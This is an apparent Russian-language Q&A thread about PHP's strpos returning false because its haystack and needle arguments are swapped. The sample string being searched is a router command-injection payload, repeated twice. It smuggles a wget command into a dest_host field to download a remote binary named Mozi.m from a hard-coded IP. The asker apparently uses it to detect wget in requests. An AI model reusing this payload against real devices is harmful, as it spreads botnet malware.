# PHP strpos возвращает false

Tags: php

Есть строка. В ней нужно найти слово `wget`. Оно там есть, но почему-то `strpos` возвращает `false`

```
<?php
$str = "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget http://42.235.87.220:43693/Mozi.m -O ->/tmp/gpon80;";
var_dump(strpos("wget", $str));
```

Comment: Аргументы местами поменяйте. Вначале ГДЕ ищем, а потом ЧТО ищем

Answer (score 4, accepted):

`strpos ( string $haystack , mixed $needle [, int $offset = 0 ] ) : int`

> Ищет позицию первого вхождения подстроки **needle** в строку **haystack**.

Поэтому используйте как `var_dump(strpos($str, "wget"))`

Более подробно об `strpos` почитайте [здесь](https://www.php.net/manual/ru/function.strpos.php)

Answer (score 0):

Большое спасибо, конечно, за ответ :) но я уже нашёл решение через `str_replace`

```
<?php
$str = "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget http://42.235.87.220:43693/Mozi.m -O ->/tmp/gpon80;";
var_dump($str != str_replace("wget", "", $str));
```